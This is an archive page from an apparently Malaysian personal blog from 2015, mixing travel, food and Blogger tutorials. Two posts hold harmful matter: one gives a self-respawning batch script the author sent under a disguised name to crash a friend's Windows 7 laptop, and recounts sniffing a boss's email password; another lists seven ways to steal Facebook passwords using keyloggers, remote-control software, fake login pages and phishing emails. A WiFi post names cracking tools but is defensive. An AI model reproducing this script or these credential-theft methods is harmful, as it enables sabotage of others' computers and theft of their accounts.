Monday, October 12, 2015

Wednesday, October 7, 2015

Kuala Ibai Lagoon Park

Kuala Ibai Lagoon Park is located in Kuala Ibai, Kuala Terengganu sharing the same location as PrinzPark Hotel, Terengganu Equestrian Park and Tengku Tengah Zaharah Mosque or famously known as the Floating Mosque among the locals.

kuala ibai
recreational park area
Continue Reading →

Monday, October 5, 2015

Redang Island. A journey to remember

On 1-3rd October 2015, me and my family had a family vacation Redang Island, Terengganu, Malaysia. We have a very joyful and memorable moments there. Redang Island is one of many islands in Terengganu water. Among other attractions to Redang is Redang Marine Park which is located near Redang Island.

We departed to Redang Island on ferry from Shahbandar jetty on 9.00 a.m ferry. We took 3D2N package direct from Redang Lagoon Resort which we found the cheapest and worth for money package for our trip. There are many other packages offered by other resort operators and travel agents ranging from medium range to high luxury package. Of course the price will be higher for the more luxury package.

redang island ferry
Inside the ferry
Read more >>>>>>
Continue Reading →

Tuesday, September 29, 2015

My adsense account had been approved!!! Thank you GOOGLE

google adsense approved
Finally, after four times applying to google adsense for this blog, my application got accepted. That was on the 3rd google account. Pheww.

First thing first, I logged on to adsense dashboard and then I realized that it is really messy to log in and log out and log in again from blogger to adsense account as I'm using different google account for both.

The solution? I log in to my primary blogger account and invite my other self on the other e-mail address that was approved for google adsense as an author. Next I log in to the other e-mail address and accept the invitation. Then I log out and log in again as the primary blogger account and set the other me as an admin to the blog.

Then log out again and log in again as the adsense approved google account and then, NO more mess.

Unluckily, the google adsense ads section is still blank not showing anything. Why? Why? Why? I asked myself and checked if something went wrong, cross check the publisher ID in adsense dashboard and in blogger layout. It were the same ID. Then I tried to manually insert the ads code into blogger HTML/JavaScript gadget. Still, no avail. What is going on here?

I had highlighted the problem to google adsense team using the feedback form provided in adsense dashboard and do some googling. It seems that the problem is due to my previous previous previously disapproved adsense account linked to the blog. Google will take some time to clear out the other accounts before ads start showing up. I will just wait till then.

waiting

Continue Reading →

Sunday, September 27, 2015

Link Exchange Segment

I'm searching for 100 blog addresses to be included into this permalink list.

1. Like Read This Got This Page (bottom left)

2. Follow me on G+ (left)

3. Put Read This Got This link ( http://learningtoolcheap.blogspot.com) in your linklist/bloglist

4. Put your link in the comment section to be incuded in this list (updated daily)

Format:

Name :
Blog Address:
Blog Title:

This links list will also be copied to Read This Got This Bloglist (after 100 links collected)


List update 27/09/2015

1. Radio Senyap



Continue Reading →

Tuesday, September 22, 2015

Sunday, September 20, 2015

Ketupat Sotong, yummy stuffed squid.

Image credit : http://yummyliciousthepurpleheartsway.blogspot.my/

Ketupat sotong, in English term the most appropriate word is stuffed squid. It is a traditional Malay foods commonly found in coastal area of Malaysia, famously known in Terengganu and Kelantan. 

Glutinous rices are stuffed in cleaned squids and secured by attaching a piece of skewer then cooked in the sauce which is made using Read More >>>
Continue Reading →

Monday, September 14, 2015

Add Home Button to Blog Header and Customize Blog Labels

To increase SEO (Search Engine Optimization) score for your blog, it is a very wise idea to use label for all your blog post. Default label given by simple template in Blogger.com is too simple and not so much attractive. I start using label after realizing a lot of blog tycoon are using labels in their blog. In this post, I will share on how to:
  1. Create label on post
  2. Display labels in your blog header area
  3. Use CSS to customize labels look
  4. Add a home button inline with labels (by default no home button provided except for the post footer)

1. Create label on post

After completing your new post, under the Publish button there is an area for Labels, Schedule, Permalink, Location, Search Description and Options. Click on Labels area and  fill in your post label. Then click on Done

post labelling

2. Display labels on your blog header area

Go back to your blog dashboard then click on Layout. Click on add-gadget in cross column section and choose Labels
add new label

add label

customize blogger label

In title box, fill in your label list title, modify all the other options as you wish. In Display area, choose either List or Cloud. Untick Show number of posts per label to hide post count for every label. Those numbers are usually hard to customize but it's up to you.

label jenis cloud
Label Display Cloud

label jenis list
Label Display List

Your blog labels look different than the picture above?Don't worry, read on

3. Use CSS to customize labels look

This part includes blog template HTML code editing. Backup your template before modifying any HTML code

From your blogger dashboard , click on Template-Customize-Advanced-Add CSS

customize label blogger


Insert codes below in the Add CSS section. You can modify Font style, Font Color, mouse hover color and other styles. Click Apply to Blog to save this changes


.label-size{
margin:0 2px 6px 0;
padding: 3px;
text-transform: uppercase;
border: solid 1px #C6C6C6;
border-radius: 3px;
float:left;
text-decoration:none;
font-size:10px;
color:#666;
}
.cloud-label-widget-content{
text-align:center
}
.label-size {
background:#ffffff;
display:block;
float:left;
margin:0 3px 3px 0;
color:#ffffff;
font-size:11px;
text-transform:uppercase;
}
.label-size a,.label-size span{
display:inline-block;
color:#2E2E2E !important;
padding:6px 8px;
font-weight:bold;
}
.label-size:hover {
background:#E2E2E2;
}
.label-count {
white-space:nowrap;
padding-right:3px;
margin-left:-3px;
background:#ffffff;
color:#fff !important;
}
.label-size {
line-height:1.2
}


4. Add a home button inline with labels (by default no home button provided except for the post footer)

Your Labels now show all labels tagged in your blog posts but there is no Home button to return to your blog homepage. To insert this Home button, also needs you to modify your blog template HTML codes. Backup your template before making any changes for your own safety.

From your blogger dashboard, click on template-Edit HTML then click on Jump to Widget and choose label1 or any names given in add gadget step. Then expand the codes for label1 and codes for main by clicking on small arrow beside the line number of those 2 codes.

customize label blogger
expand widget

tambah link ke home blogger

Insert the codes below right after first <ul>  label1 scope. These codes are for list display type labels.

<!--add home to label type list-->
<li><a class='home-link' expr:href='data:blog.homepageUrl'>Home</a></li>
<!--add home to label type list-->

Insert the codes below right after first <b:else/> after last </ul>. These codes are for cloud display type labels.

<!--add home to label type cloud-->
 <span expr:class='&quot;label-size label-size-&quot; + data:label.cssSize'><a class='home-link' expr:href='data:blog.homepageUrl'>Home</a></span>
<!--add home to label type cloud-->

Click on Save Template button to you save your blog's modified HTML codes and cick on View Blog to view the results
Customize blog label dengan design sendiri dan tambah Link ke Home di bahagian atas Blog


Good Luck

Read This Got This : $25K for solving a riddle
Read This Got This : 4 ways to eat keropok lekor
Read This Got This : Google analytics for blogger
Continue Reading →

Sunday, September 13, 2015

Decrypt these codes for USD25,000.00

usd25k decryption challenge

An anonymous team had organized a decryption challenge with an award of RM100,000.00 (approx. USD25,000.00) to decrypt three set of codes. This challenge had been highlighted in Lowyat.net website, the biggest I.T community in Malaysia.

These codes had been encrypted using AES-256 military grade encryption method. Yup, 256bit and 14 hashes. That will take a very loooooooong time to bruteforce. You must have the secret keys to decipher the codes.

The encrypted codes are :

Code 1

 –##–eyJHMDkwMjQwQiI6IlVFMFFJZG5ERFl2K1wvdkUrY20wT2JnbHhGR1wvYkJhcGlrRmlaWmtSWFwvVktIM1dKc20zTlVDVjJXWDB4YTRUVFJpVEJvVDN5NFZGNHNmNllmanVKWGdZSmlOcExKZVZOajUycGtYNURXbUZ5RGxZVkhXRWRVQ0JOTVVhYm1SSWhuXC9tWVY0a1ZqME5oUnJJQlwvM1ZNTEhzY1JvYXl1WDhhWnkzQ1pOOUNSSGtvPSJ9–##–XMthlftLS6A62CLoaRG9I6lRCmmktQ1ZF8rkfIYZmOMI/oS26IXrm2dHgTmLsVFi5kK0EYvlSjzOkn14uMOGJCIkYpghmGm3FSsRGfRrRUGKetvAsokQi+Sra3RmxoxXCWwBuVwdNt9pMadvItMzdFYinyhNmw+OBbYuPgmIiQwwtOydHJ46y9U8kJYlNzEfjH4hnc3GsD+xfwZQutQXYi1C+PxOGpIcvwjIoTccGL4Wp673JFHjs/EjREtCz9Lq–##–


Code 2

–##–eyJHMDkwNjQ3MiI6IkRZbjg1NUpKVnJOajRuV055akNnUGlwdllBSjVXUDJPeHRxdDBzeVltNlN5ZUlkbXNwNnFRMzNQdVZQT1wvQ2tLVzNLUURsK2ZkajZLK2I3bytDNTlYMGdia3hIcHlyUmtwbUFBRUUzZEhSXC9RcUU3QTlOUGFWcGk3NjhleVA0ZFdLR0orYjZTQVZGVGF4amV4Y1A3THVBdVFCcHpCemlxcXpiSjNjZDFINjhBPSJ9–##–K1JCm+R+1MEZhcOtN8bLNui4ulpKbPaDqB2pzq5gSB2M4k77oxb4PTkFaEt1z3YZxJ8OVMQyCSFcfQePwbwjxLqbq00+kVmNdw4j30Cd/459RBCfDsRodayJdoACk91mn+PLCor2bjJa4ZOJn6D3kvJS0HV85mVnxe1bgWFqrW+rzyQZGjKO/i53MH3vdCSEmjpxLHmziRq2xHoDGKDm7Y5KLto949aAZVOZNkD83pSNOjja2nNuQZuetjCzR2tn1uDZ3iHHxzpdkBeJ6I8pj7YifljZ9bMqSKk8c2LhPGO06gJvCfgetnkjh0CC28rk–##–

Code 3

–##–eyJHMDkwNkIyRCI6Ik81ck5DcG1Tb0VyZUFUNGVxSFk0c2RGRW9Fc0F2ZHJSQ21aenBRUktqMHNoYnNlY2ozak9uYkt1c2drajJaUjZrMHlzMHVaSUZ3ckMyRmpWbmVOaWdPc2Vud3hoTkNzZWIzUDRkK2syM1dNdUFRYVNJNTAzWHdDcGcyWnVaYnhtbWpOQnFPd2E3cFhFczRGajJaUENvcG4zRDJCQ1hpaFRCeXNlUndhQnU1QT0ifQ==–##–Rnk1a0AO/xWjkTbJ08r0abZ12Bz+edMuOWXrAk9BfoB3vrXS4zaZsNwIYIsGwieo/OR/BzRBOnmRFW0dsieLYXKr1cBswqtKgnS+xhjjDmlfPFwemZzoIOe2X4FWmuwgluKSMkk+vPxpa9LwkAx3tqiUYsYY2tKjR5HP5D3T2N/1JqdJaKcXw4cQwnwmvqmma+Dzb76Q01Pk8+n6MzoTJ1wG21h2HgM1g2ZelELcgXu+jBdO4jtPpqgWy3w1FnNBlFLoVp7ey5QiaDkLEJvJksfbBooEDLc+4Cmf7U5QNrg8uNY7XXfSAo7PPTaVOoDT–##–

The organizer had set up a set of rules and regulations :

  1. This challenge is open to all Malaysians and Singaporeans to participate
  2. Participant must decipher ALL the 3 encrypted messages correctly to be considered as a winner
  3. Participant will need to provide their email address and contact number upon submission
  4. Participant will need to submit ALL answers latest by 17th Sept 2015 at 12.00pm. Any late submissions will not be entertained
  5. Participant to email the answers to hackchallenge@yahoo.com
  6. Organizers will only contact participants with the correct answers
  7. Participants who successfully deciphered the messages will be requested to do a demonstration to the organizers on the way the messages were deciphered
  8. Submissions from participants who are related directly or indirectly to the organizer and the rest of the team will be disqualified.
Well, it is a bad news for peoples from outside of Malaysia and Singapore as this challenge is opens only to Malaysian and Singaporean but if you can decipher the code, you surely know how to beat the rules.

The organizer had set up a website for this challenge with some introductions to AES256 encryption and some hidden secret keys. Go to their website here and start digging. Good luck. 
Continue Reading →

Friday, September 11, 2015

4 ways to eat keropok lekor

Terengganu is located in the shoreline of Malaysia, rich and famous with its white sand beaches and handfull set of islands. Whoever come to Terengganu must be delighted with it's people, it's nature, heritage and mind relaxing atmosphere.

Among other things popular in Terengganu, of course it's famous keropok lekor. Made of fish fillet and cornstarch mixed together and Read More >>>
Continue Reading →

Tuesday, September 8, 2015

i'm stuck here and I don't know what I'm doing

I have been working for the same corporate company in my hometown here in Malaysia for almost seven years now. Yet i'm still holding the same position as i entered this company on 2008. Some of my co-workers had been migrating to the other company to get better position and pay but I'm still here. Some of my friends and clients had been wondering why I'm still here. Why I'm still an engineer. Why don't I migrate to other company despite my experiences and knowledge. No, I'm not loyal and no, i didn't refuse to attend any interview invitations.



One of my client called me a moron because I once had turned down an offer to replace my former boss but referred a co-worker to take up the position and now, I am his subordinate. Well, I have my own reason.

Among all interviews attended, there was an interview that I remember most , an interview for a project engineer position with a tank maintenance contractor. At the first segment, I was being interviewed by the GM of the company. It went very well, not so much technical questions asked. I answered every questions asked confidently. The atmosphere changed when his project manager entered the room. He asked set of a very technical question which I got to answer all of them. Then he asked some management related questions. He asked for specific words of every project management tasks. I failed to give him the words. I had been doing project management for 7 years but still can't give the words he wanted. I have been working day and night without knowing what i am doing.

I am a Computer Engineering Graduate from University of Technology Malaysia. I started off my career as a system engineer for a year before enrolling in Welding Inspection Course certified by BINDT. Then I started working in a very different field. The project manager told me that I won't go further in this field as a project engineer because my computer engineering degree won't be of any help in tender bidding exercise. Certain clients are very strict in technical background assessment. Then I realize why I'm stuck. After the interview, I stop applying for project engineer position and start applying for marketing position. I got zero interview invitation.

For some people that are still asking on why I didn't take up the offer to replace my ex-boss, my answer is I don't want to be alone. There is a saying that says the higher your position, the loner you become. You will be surrounded by the people that only want something in return instead of true friends. I could see the thing happened to my current boss which is my ex-co worker back then. He is lonely, subordinate feel uneasy and feel like being forced to accompany him at the cafe. I don't want that thing.

For now, I'm waiting for me and my family 571 visa approval following my wife to pursue her study in Australia. We will be there for 2 years beginning next February. This is the real reason actually why I'm stuk here. God knows what best for me. Maybe this is the turning point for me to start a new life, a new field of work after those 2 years. Thank you God.


Continue Reading →

Monday, September 7, 2015

Preventing unauthorized access to WIFI network


WiFi has become a standard network for every household in the world. Almost every house in the world that subscribed to Internet uses WiFi for networking system. Do you know WIFI network could easily breaked over by intruders? Do you know counter measures on preventing unauthorized access to WIFI network? There are 3 common types of WiFi in the world:

1. Open WiFi
2. WEP protected WiFi
3. WPA/WPA2 protected

Open WiFi commonly used in public WiFi hotspot and hotel along with a user control gateway portal. Everyone can connect to the network but only users with valid username and password could access the Internet. There is also some users that use open WiFi for their private network risking unauthorized access to the network

WEP protected network is the oldest and weaker type of protection. Attacker could use tools such as Xiaopan or Kali Linux and perform ARP poisioning attack to gain access to the network. 

WPA/WPA2 so far is the strongest type of protection against penetration attack. It is possible to hack WPA but will take much longer time assisted with a set of guessed password list. There is a tool named reaver to shorten the time needed to hack WPA password. Some older devices doesn't support WPA type network. If this is the case, use other means of protection such as MAC fitering.

How to prevent unauthorized access

1. Disable WPS Pin Code.
WPS is WiFi protected Setup designed to ease the process on registering new devices to a wireless network. There are 2 types of WPS, Pin Code and Push Button. Push button is more secure to attack
because it needs physical access to the router push button compared to PIN code which  is very unsecured. Xiaopan and Kali LINUX users can take less than 5 minutes to crack the PIN code using Reaver


2. Use WPA/WPA2
WPA/WPA2 is more advanced and more secure than WEP authentication. Refer to your modem's manual on how to change the encryption type. Cracked WEP key could also be used to crack encrypted data travelling through your network risking leak of sensitive information. Use WPA/WPA2 instead of WEP

3. MAC filtering
This is for me the safest method to protect your network against unauthorized access unless the intruders have physical access to your devices and spoof their MAC with your MAC address. Using this method, only allowed MAC address given access to the network. Xiaopan or Kali Linux would never get any chance to crack your network.

4. Use wireless access gateway
This system is used for Internet access in hotels and paid hotspot scattered around the globe. Username and passwords are created in random and could only be used once. Hotel's or restaurant owner should use this system to protect their network.

Some people take a light attention to network security. They think of "Nothing loss, only some speed reduced". However there are so many possibilities that could be done by the intruders once they got access to your network listed but not limited to below:

1. Read your ISP's username and password.
Routers' configuration embedded web server usually doesn't use HTTPS. The password field is masked but could be easily unmasked using inspect element function. They could use your login info on their DSL line.

2. Change your router configuration admin username and password
Many users use default supplied router admin username and password which is attainable with a click on google. They could login to you router and change the username and password preventing you to change the WIFI password


3. Read sensitive data.
Cracked wireless key means your encrypted data could also be decrypted using the same key. Your phone number, sosial number, corporate email or your banking details could be read by the intruders.

Remember, our network is our network. Protected network means protected data and sensitive information. If your network suddenly becomes slower and your routers LEDs are blinking heavily, out of usual. Check your wireless network client. Your network could be attacked by someone. Take action and use counter measures to prevent unauthorized access to your precious WIFI network.


Continue Reading →

Sunday, September 6, 2015

Mahkota Dewa : A fruit of god?

mahkota dewa tree
 "Mahkota Dewa" scientifically named Phaleria Macrocarpa translated into English as "the god's crown" . This fruit origins from New Guinea Indonesia and famously known in Indonesia and Malaysia as a fruit with many benefits from stems, shell and leaves.

These pictures were taken in my parent's backyard in Terengganu, Malaysia. They planted and process these miracle fruit for their own consumption. No wonder they have a great health and still look young despite of their age.











Scientific studies had been performed and proved certain medical benefits of "Mahkota Dewa" namely Read More >>>


Continue Reading →

Tuesday, September 1, 2015

Google analytics for Blogger

Imagine that you are a supermarket owner with plenty of sections placing various type of products. Which do you prefer, a potential buyer that have various interests and browse through many sections or 100 potential buyer with 100 different interest go directly to their interest section?

In a world of blogging and online market, those 2 types of scenario actually present and greatly influence the performance of a blog or website. Now we need to understand the basics in measuring your site's popularity

Pageview

Pageview counts how many time your page is viewed. for example, a visitor land on your main page, that counts 1 pageview. Then he click on another post link , counts 2 pageview. If your site have 10 pages and he goes to all 10 pages, that counts 10 pageview.

Visit/Unique Visitor

Unique visitor counts every different person that goes to your website identified by their IP address. Ip address is unique. This is the most essential numbers to measure your site popularity

For blogger platform users, there is a blog stat function that shows how many pageview counts by day, week, month and all time but is it accurate? Didn't you realize that the pageview counts also add up when you refresh your page? Also listed in stat function are post view counts, traffic source counts and audience counts. Still the data is not sufficient to determine WHO are the visitor to your site, what type of person they are, what are their interests, how much time they stay on your site, how they come to your site and how they get out. Those are set of parameters that are very important to improve your site content and ad targeting. We need to use google analytics to access those set of parameters. Trained webmasters are very familiar with Google analytics but as a blogger or blogger to be lacking the webmaster's skills, do you know how to use analytics with Blogger.com? Read on guys. It is easy as a pie.

First thing first, head on to google analytics portal here and sign in to google analytics. Use the same account as in blogger.com

analytics sign in

After logged in, for first time user, you will be presented with some introductions on google analytics. Either follow the instructions or you can skip it.

Now go to admin tab, on account section(the leftmost). click on the dropdown list and select create new account.

set up google analytic account

Fill in the name of this new account, your blog url i.e http://learningtoolcheap.blogspot.com , industry category and reporting time zone.
google analytics form


Leave all those check marks checked and after finished with the form, click get tracking ID. Copy the tracking ID and paste it in notepad
google analytics form 2

At this point, analytics account setup had been finished, now head on to you blogger account, log in and go to your blog dashboard. Click on setting-other. In Google analytics section, paste tracking ID supplied in previous step in Analytics web property ID text box.
setting up analytics in blogger

Now your blog have been integrated with google analytics. Google crawler will take some time to reach your blog. After an hour or two or in some cases 24 hour, the data will start showing in google anlytics. After logging in, you will see your account overview with some summaries of the data collected. Now click on your account to see its detail

google analytics account

 You will be shown the site audience overview with its Sessions, Users and Pageview.

google analytics account overview

Click on audience-geo-location. Your audience location count will be shown here. In this example, the audience are mostly come from Malaysia

google analytics audience overview

Click on audience-mobile-overview, you can see how many users use desktop, mobile and tablet to access your site. In this example, majority of them use mobile.

google analytics mobile technology

Let's dig deeper, click on audience-mobile-devices. You will see counts of each mobile brand your audience use to access your site.

google analytics mobile brand

This one is my favourite feature of google analytics. In-Page analytics. Click on behaviour-in-page analytics. Some chrome users will experience error in opening this item. Just click on load in full view

full view

This feature will show how your audience behave in your site, how long they stay in your site, how many users are viewing your site in real time and what do they click on. This is very important in planning your ads and link placement. It also could give rough ads click count.

google analytics in-page analytics full view

For this special function, google had developed a chrome extension that could show your site in-page analytics without going to google analytics portal. Get the extension here and install it.

google in-page analytics chrome extension

Go to your site and click on the analytics button to show in-page analytics.

in-page analytics chrome extension

Click the button again to turn it off.

In the example above, majority of the audience are using mobile device to access the page. It is essential to make sure the page performs well in mobile device browser. Do you need to buy all mobile device or let say borrow it from your friend to test the page? Absolutely no, don't have to do that. Just install mobile browser emulator chrome extension. Get it here 

To emulate the mobile device browser, go to your site and then click on the 'm' button and select which device you would like to emulate. A new window will open will an emulation to your site in selected mobile device. 

mobile browser emulator

With those set of tools, you can customize your site and plan your content to cater every aspects of your audience behaviors and properties. Keep working on and use Google analytics for Blogger to grow your blog. Good luck
Continue Reading →

Wednesday, August 26, 2015

The one cent thief that owns a Lamborghini

Aman Shah was a 24 years old bank executive on 1990 working as a specialist in Hock Hua Bank, Malaysia with an income of RM1800.00 at that time lived in a very luxurious life including 6 supercars that was affordable only by a millionaire.

His luck begin when he caught his fomer boss's attention that sent him to a computer courses where he learnt the skills to perform his operation. He then appointed to Head Of Department of SPEED processing (Electronik transfer system for fund and securities).

It was learnt that he Read More >>>
Continue Reading →

Tuesday, August 25, 2015

Facebook advertising? Like or lies?

Facebook advertising? Like or lies? I bet many of us bloggers had tried Facebook advertising to get likes or to boost post and got many likes. Have you ever wondered do all the likes are genuine and sincere likes? Now, let's see the engagement. Do you got a good ratio of engagement to reach quantity?

Facebook advertisingMy page Read This Got This got 464 likes from merely 1 likes after running FB page likes promotion for 3 days on RM20.00 budget ~USD$5.00. The country and interest targeting was left to default option. Guess what, most of the page's fan are from Pakistan. 





Facebook advertising
Another page Radio senyap got 53 likes from 0 after running the same promotion period with the same budget but with targeting set to Malaysia only and interest selected to only related to the pages all about. The likes are mostly from Malaysia.





After several posting on both pages, I got the reach and engagement results and also link clicks count.Then I started wondering why the reach are great but engagement and clicks are not developing for Read This Got This. However Radio senyap seems to have an acceptable reach to engagement ratio.

Facebook advertisingRead This Got This has 464 likes with 228 engagement and 154 post clicks   


Facebook advertising
Radio senyap has 53 likes with 247 engagement and 240 post clicks. Smaller likes but more clicks.



Facebook advertisingLooking into the pages insight, I realized that most of Read This Got This 's fan and reach are from Pakistan. So I tried to post something that looks a bit Pakistani to see if I could get more engagement but the result is still the same.







Facebook advertising
Different situation happened to Radio senyap, most of the pages 's fan and reach are from Malaysia. Once I posted a catchy title to the pages and it got 3k reach with 200++ link click. It was acceptable than 2K reach with 2 link click on Read This Got This.






At this rate, I wondered do all the likes are genuine, do they really want to like my pages or they just did it out of any basis. Do they really read my post? After watching a video in youtube as posted in Reddit /r/blogging subreddit I got my answer.

As the conclusion, if you created a new pages and want to look great in front of your friends, use FB ads with no targeting and interest set. If you want to have genuine and intended likes, use targeting and interest setting. 

Let's watch the video by Veritasium below:



If you are planning to use FB ads, plan carefully. Don't get too happy with many likes. Target your audience for more genuine and intended fans. Not those from click farm or random click workers.
So, Facebook advertising? Like or Lies? You have got your answer now..


Continue Reading →

Monday, August 24, 2015

Crash a Win 7 system with a simple batch file

batch fileSome evening, a friend of mine asked me if I ever have hacked a network or ever created a virus program or ever created a batch file that has the ability to crash a Win 7 system, my answer was no without ever seeing him in the eyes. Although I had done those before, my answer is always no because I don't want to be seen, unless I want to be recognized.

Actually I had once captured the email password of my ex-boss using network capture program. That time, our corporate e-mail used a very simple e-mail client without any encryption. I got the password and actually felt my effort was useless because he was still using default password supplied to every new recruit enrolled in our company. 

Another time, I used IP scanner to find the IP's of thumbprint system on our office, found the information of the brand and downloaded the utility software of the system. Using common set of familiar admin password, I got access to the system and read the system's record but I didn't do anything on that and I didn't tell anyone on the breakthrough. Then on self integrity reason I removed the software from my laptop

Last year, another friend of mine keeps irritating me with his 'mooning' Skype smiley everyday. I just can't resist to punish him so I started searching on the Internet on how to use windows scripting to run a simple command in continuous loop.  I found my way, and send him the file with an innocent-can't- help-but-to-open file name then his laptop crashed. Even me myself can't do anything to stop the script except to force reset the machine. He got what he deserved, it was kind of me not to put the command to autorun the file on boot cycle. Let's study the code

---------------------------------------X start below this line--------------------------
SET /a i=0
:loop
IF %i%==10 GOTO END
start rahsia.bat 
ping anywebsite.com
SET /a i=%i%=1
GOTO LOOP

:END
---------------------------------------Until before this line-------------------------

Replace the red font rahsia.bat with the file name of the file
Replace the red font anywebsite.com with any website address. This is the simple command.
The loop break on i=10 but i value always get reset to 1 so the loop will keep looping continuously.

Copy the lines of code and paste in notepad, save as type all type save as name as what you replaced the rahsia.bat red font. 

Run the file.


BEWARE: This file is simple but it is really and proven , tested to have the ability to crash a win 7 system. USE on YOUR own risk. I am not going to take any responsibility for any damaged done to your system. 
Continue Reading →

Sunday, August 23, 2015

Ancient gold bars found in ex-Japanese war tunnel

gold bar sabahGold bars reported to have been found i a Japanese WW2 war tunnel tunnel in a plantation owned by Sime Darby in Sabah, Malaysia. News spread out in social media including findings of gold bars etched with the word Sumatra , dated on 28.08.1941 and 999.9 However the truth on the news cannot be verified as none of the plantation's worker admitted the findings. Rumors said that all the gold bars had been taken by the workers hence no gold bar found Read More >>>

Continue Reading →

Friday, August 21, 2015

Facebook Authorship for Blogspot Blogger. Confirmed working

Hello. As you can see using PC or mobile browser desktop view some people's blog or webpage link share on Facebook is written with author name written in blue link that people can hover to like or follow from the link itself without ever going to the person or page's FB profile.

Most of the links are wordpress based blog. You use blogger platform, you had tried the tutorials written by the others on the web but still the author name is shown either your name or no name or author name with a static text. Are you happy with that? Do you want to know how to change the author name to your FB profile link or FB page link? Read More >>>
Continue Reading →

Thursday, August 20, 2015

How to remove black shadow box without clicking anything


If you click on certain links posted on facebook, there is a chance that the link will force you to like their facebook pages or share their link to remove black shadow blocking visual access to the website. How to remove black shadow box without clicking anything?

Some people just click on the like button or share button and your partner, your friend , your child, your mama could see it on your timeline. It could be embarrassing if the link is an adult only link or sexy picture or sex technique. In certain part of the world, those kind interest is somewhat embarrassing. 

Some people just close the link or click the back button but what if the link is too interesting not to read about. There must be some way to overcome this headache. Some people already know the trick while many more didn't know it. Read on..

1. Chrome extension
There are some extension called quick javascript switch switcher which can quickly switch javascript to enable/disable, script block that can block additional script from running and AdBlock which can block all ads from showing. Ads usually use javascript and ,<script> element to run. Those extension detect the element and block it form running. Some ads provider has overcome these by developing anti script block and anti ad block that can detect if your browser has these extension, the webpage will stop loading

2. Inspect element (Chrome)
To toggle inspect element, right click and select inspect element. There is a script that prevent right clicking, use the shortcut (ctrl+shift+C). Now they also have a script that prevent the shortcut, just open a new tab and toggle inspect element then copy the link address on the toggled inspect element tab.

how to use inspect element
Now click on the magnifying class, it will turn to blue, then hover to the black area, the whole black area is greyed out if it is the right place. Then click on highlighted text in the bottom section. Delete the line.



clear mask
The black shadow is now vanished. No more embarrassing likes or shares on your timeline.









That's my way on how to remove black shadow box without clicking anything. For those who just happened to know about inspect element. Be creative and explore other means on using this function. Hint..: some mask


Continue Reading →

Tuesday, August 18, 2015

7 social engineering techniques to steal facebook password

social engineeringFacebook has become more and more secure and is very hard to be hacked off to steal anyone's password. In one episode of a popular series, Leverage, they had come upon a person which us an old computer without any connection to the outer world and made hacking the computer to be impossible. Guess what, they hack the guy's mind. Literally, of course. Using the same idea, listed here 7 social engineering techniques to steal facebook password.


1. Share your laptop with the target. Use google chrome  
social engineeringLet the victim use your laptop/PC with your chrome browser left open logged in with your google account. Usually people will only click the left most button on any prompt. If you got lucky the target will save their facebook account password in your saved password database



social engineering2. Again, share your laptop/PC 

If the target is a detail person, they will read the save your password prompt and click on nope. Overcome this using a keylogger software that also keypress. Google it 




social engineering
3. Install netviewer on the target computer 

Netviewer can allow you to peek the victim's screen and can control the computer remotely, it has a mobile remote. So, get creative, after they logged in on facebook, loose their attention and reroute then reroute the browser to a mimic facebook relogin page which store the login and password in a secret dark places

social engineering


4. The old trick, e-mail 

If the victim network is heavily barricaded with a firewall, use the old technique by emailing them fake very similar link to facebook compulsory change password page or warning them on account login confirmation. Some fools will still fall for this trick






social engineering5. Cut the connection 

This trick needs you to sit near the network WAN connection physically. Whenever the victim login to their facebook account, pull out the cable. Then reconnect the cable after a while. They will freak out and then show them your cached facebook page and offer them to use your computer. Then again , use google chrome or keylogger technique






6. Develop a new software called facebook account stealer

Develop a new software which prompt the users to login and then display a mimic act of monitoring and searching for facebook account then give it an endless loop to make it a not responding programs and force close the software. Give it to the victim as a trial.

7. Ask them 
social engineering


Ask them during their sleep talking. 80% of person will just answer any question asked during their sleep talking. Why don't you give it a try. 







Disclaimer :
Those are ideas only. Use it on your own creativity. This blog and the writer are not responsible of any facebook account stealed using this 7 social engineering techniques to steal facebook password
Continue Reading →

Popular Posts

Recent Posts


air asia bloggers community

Unordered List

Text Widget

Pages

Total Pageviews

My Blog List



Google+ Followers